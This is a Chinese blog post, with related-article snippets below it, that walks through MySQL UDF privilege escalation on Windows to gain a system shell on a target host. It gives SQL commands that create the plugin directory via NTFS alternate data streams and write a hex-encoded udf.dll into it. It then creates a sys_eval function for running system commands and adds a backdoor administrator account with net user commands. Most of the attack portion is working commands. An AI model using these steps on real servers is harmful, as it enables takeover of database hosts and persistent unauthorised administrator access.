Mysql-UDF提权

最新推荐文章于 2024-06-08 15:51:52 发布
最新推荐文章于 2024-06-08 15:51:52 发布
阅读量1.7k 收藏 6
点赞数 3
分类专栏: 常见提权汇总 文章标签: 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53577336/article/details/119700116
版权

0x00 提权简介

UDF介绍:User Defined
Functions简称UDF,通俗来讲就是用户可自定义函数。udf提权就是利用到创建自定义函数(sys_eval),在mysql中调用这个自定义的函数(sys_eval)来实现获取对方主机的system的shell权限,从而达到提权的目的。
简单来说便是利用提权脚本放到对方mysql指定的目录下,运用脚本创建自定义函数,使用函数即可获取shell权限。
我们需要将duf.dll文件放入C:\phpStudy\MySQL\lib\plugin,前面路劲可能跟我不一样,但是需要做的就是将dll文件放入\lib\plugin目录中

Mysql版本大于5.1版本:udf.dll文件必须放置于MYSQL安装目录下的lib\plugin文件夹下。
Mysql版本小于5.1版本: udf.dll文件在Windows2003下放置于c:\windows\system32,
在windows2000下放置于c:\winnt\system32。
如果目录不存在则利用NTFS数据流创建文件目录

> select 'It is dll' into dumpfile 'C:\\phpStudy\\MySQL\\lib::$INDEX_ALLOCATION'; 
//利用NTFS ADS创建lib目录
select 'It is dll' into dumpfile 'C:\\phpStudy\\MySQL\\lib\\plugin::$INDEX_ALLOCATION'; 
//利用NTFS ADS创建plugin目录

0x01 提权条件

1)获取到对方mysql的shell,或者是获取到mysql账号密码,能够调用mysql语句
2)对方mysql具有insert和delete权限,也就是可写可删除添加能够创建目录,写入文件
验证是否可写:

show global variables like 'secure%';

如果secure_file_priv值为空则可写,为指定路劲则是指定路劲可写,需要全部可写需要在mysql.ini配置文件添加语句:即可
secure_file_priv是限制函数在哪个目录下拥有上传或者读取文件的权限

secure_file_priv=

3)熟悉对方mysql目录结构,以及主机型号,以便使用不同的脚本
查看主机架构,以便确认操作系统位数,使用不同的udf.dll脚本

show variables like '%compile%';


确定mysql目录结构,搜索我们需要的目录位置
查看plugin目录位置

show variables like 'plugin%'; #查找具体目录
select @@basedir;#查看mysql目录

3)提权脚本我在这里简称udf.dll
在kali里面自带udf提权脚本,并且有32位与64位版本,使用只需要将文件导出使用即可
目录位置

/usr/share/metasploit-framework/data/exploits/mysql

0x02 UDF提权步骤

1)将文件放入\lib\plugin目录下
方法1.getshell工具连接,将文件放入指定位置
2.使用mysql终端,创建自定义函数sys_eval
create function sys_eval returns string soname ‘udf.dll’;


方法2.数据库创建目录,并且导入文件

create table temp(data longblob);  #以二进制数据流容器longblob创建临时data表
insert into temp(data) values (unhex('udf文件的16进制格式')); 将udf.dll脚本的十六进制写入data表
select data from temp into dumpfile "xxx\\xxx\\lib\\plugin\\udf.dll";#将udf文件导入到指定目录
create function sys_eval returns string soname 'udf.dll';   #创建自定义函数sys_eval

更多的方法有的通过mysql大马创建,原理都差不多

2)调用脚本创建sys_eval函数,验证提权

还有一种利用msf提权udf方法,这里没有简述,
msf默认创建sys_exec()函数,该函数执行并不会有回显
返回值只有0或1,1为错误,0为正确

0x03 提权常用命令

  1. select cmdshell(‘net user hsy 123456 /add’); #添加用户
  2. select cmdshell(‘net localgroup administrators hsy /add’); #将用户加到管理组
  3. drop function sys_eval; #删除函数

交流学习:
博客:http://www.kxsy.work
CSND社区:告白热

告白热
关注
  • 3
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
MySQLUDF提权
weixin_43774222的博客
03-14 635
一、getshell 1.arp扫描,发现靶机ip arp-scan -l 2.nmap扫描靶机开放端口信息 发现80端口开放 nmap -sS -sV 172.16.12.159 3.使用dirsearch扫描目录 发现vendor、WordPress等目录 dirsearch -u 172.16.12.159 4.访问vendor发现存在目录遍历漏洞 5.查看具体文件,信息收集 对文件进行查看,发现phpmailerautoload.php目录,以及reradme.md中存在phpmai
mysql udf.dll 下载_mysql udf.dll提权入侵.bat文件
weixin_34618526的博客
01-19 362
net stopdel %SystemRoot%system32udf.dll /A/F/Qdel %SystemRoot%udf.dll /A/F/Qdel %SystemRoot%tempudf.dll /A/F/Qdir %SystemRoot%system32com > %SystemRoot%system32udf.dlldir %SystemRoot%system32com &g...
权限提升-mysql提权总结
告白的博客
09-06 1055
0x00 mysql数据库提权方式简介 1)udf提权 2)mof提权 3)启动项提权-反弹shell-exp提权 提权思路:1.探针数据库的存在-端口服务,2.必须获取到数据库的权限密码,3.数据库的类型分类 重点:数据库的账号密码获取方式, 1.网站配置文件sql data inc config conn database commin include等 2.读取数据库备份文件下的库中表等信息,数据库名/表名.MYD文件储存密码,例如mysql数据库mysql_user表中储存账户密码,使用
MySQL提权UDF提权
最新发布
2301_76227305的博客
06-08 872
udf 全称为'user defined function',意思是'用户自定义函数'。用户可以对数据库所使用的函数进行一个扩展(windows利用dll文件,linux利用so文件),那么我们就可以利用这个特点,往MySQL里面添加一个可以执行系统命令的函数即可。udf提权本质就是通过添加自定义函数让MySQL能执行系统命令,仅此而已。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
mysql提权总结
weixin_45605374的博客
12-12 731
udf提权 UDF(user defined function)用户定义函数,是mysql的一次拓展连接⼝。用户可以通过自定义函数实现在mysql中⽆法例实现的功能,其新函数都可以在sql语句中添加中调使⽤,像调⽤本机函数⼀样。 前提条件 已经获取到数据库的账号、密码,可以远程连接到 mysql有写入文件的权限,即secure_file_priv的值为空。 show global variables like 'secure%'; mysql版本区别 1、MySQL<5.0,导出路径随意;
UDF提权复现
qq_51459600的博客
03-30 745
文章目录UDF提权复现环境搭建UDF提权原理提权过程 UDF提权复现 环境搭建 靶机:虚拟机Win7+phpstudy2018 ​ mysql5.5.53 ​ php5.2.17 攻击机:物理机 在已经得到webshell的情况下,利用mysqlUDF提权,在靶机WIn7上创建administrator权限的用户 UDF提权原理 条件:得到服务器webshell,知道数据库账号密码且可以远程连接 在udf.dll文件中,定义了名为sys_eval()的函数,该函数可以执行系统命令,通过该函数来完成系
udf提权原理研究-udf开发-linshao
qq_35349673的博客
02-20 3857
mysql通常是使用管理员权限进行配置,因此我们获取一个较低权限时可以通过mysql进行权限提升,本文侧重于制作utf扩展
mysql udf提权文件
02-01
mysql udf提权文件mysql udf提权文件
MYSQL高版本低版本UDF提权工具
06-20
描述中的“有两个版本”可能指的是为不同MySQL版本设计的两种UDF提权工具。 在进行UDF提权时,安全专家通常会遵循以下步骤: 1. 分析目标MySQL版本的特性和已知漏洞。 2. 设计或寻找适合的UDF库,该库能够执行提权...
Linux利用UDF库实现Mysql提权
09-10
本篇将详细介绍如何利用UDF库来实现MySQL提权操作。 首先,提权通常涉及到获取更高的系统权限,而在MySQL中,通过UDF库可以执行系统级别的命令,从而可能达到提升权限的目的。要实现这一过程,我们需要满足以下...
mysql提权udf
09-20
5. **安全防御**:对于防御者来说,防止MySQL UDF提权的关键在于强化数据库的安全策略。这包括限制不必要的用户权限,禁用对系统表的写入,使用安全的编码和参数化查询以防止SQL注入,以及定期更新和扫描系统以检测...
暗月mysql全版本通杀提权
06-21
暗月mysql全版本通杀提权
udf提权_udf提权_udf.dll下载提权_mysql提权_ballsv6_提权_源码
10-04
mysql提权udf提权所需要的dll文件,有64位和32位
udf提权
qq_44881113的博客
07-19 3775
udf 利用udf提权 UDF为User Defined Function用户自定义函数,也就是支持用户自定义函数的功能。这里的自定义函数要以dll形式写成mysql的插件,提供给mysql来使用。也就是说我们可以通过编写dll文件来实现我们需要的功能,利用UDF提权需要知道root账户的密码 文件末为.so,则为linux系统,如果是win,则后缀为dll 开始提权 1 根据数据库版本选择上传udf.dll的位置 select version(); #查看版本 如果版本号大于5.1.4 上传
mysql udf shell_MySQL使用UDF调用shell脚本
weixin_31032795的博客
01-21 282
前言在最近的项目中,由于需要使用MySQLUDF(user defined function),这个特性从未使用过,而且个人觉得这个特性以后应该会经常使用,所以写下博文,记录和分享这个特性的用法。UDFmysql的一个拓展接口,UDF(Userdefined function)可翻译为用户自定义函数,这个是用来拓展Mysql的技术手段。1. 下载2. 安装#安装mysql的两个依赖包[root...
UDF提权
秋水的博客
10-03 763
0x00 简介 看到了一些文章,有MySQLudf提权,也有MSSQL的udf提权,这里以MySQL为例 udf是什么? udf = "user defined function",即用户自定义函数 是通过添加新函数,对MYSQL的功能进行扩充,性质就象使用本地MYSQL函数如abs()或concat() 如果mysql版本小于5.1, udf.dll文件在windows ser...
udf手动导出提权
收集盒 Book box
03-08 2067
当默认udf导出失败时,可以尝试用手动方法导出udf进行提权,具体方法如下: 先上传udf.dll,连接到mysql,再按下面步骤执行sql语句。 create table zz(abc longblob);//注意列类型为longblob 2.insert into zz values(load_file('C:\\udf.dll')); //上传的udf.dll路径 select *
传说的udf.dll提权select语句
u012795264的博客
11-07 3792
Select Unhex('4D5A90000300000004000000FFFF0000B800000000000000400000000000000000000000000000000000000000000000000000000000000000000000F00000000E1FBA0E00B409CD21B8014CCD21546869732070726F6772616D2063616
Mysql_UDF提权
热门推荐
极客神殿
02-04 1万+
Root权限一、上传udf.dll小于mysql5.1版本 C:\WINDOWS\udf.dll 或 C:\WINDOWS\system32\udf.dll 等于mysql5.1版本 %mysql%\plugin\udf.dll 用 select @@plugin_dir 查询plugin路径 默认 C:\Program Files\MySQL\MySQL Server 5.
mysqludf提权
10-15
但是,如果攻击者能够创建自己的UDF并将其加载到MySQL中,则可以利用UDF提权攻击,从而获得系统管理员权限。 攻击者可以通过以下步骤进行UDF提权攻击: 1. 创建一个恶意的UDF库文件,其中包含提权代码。 2. 将恶意...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

告白热

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值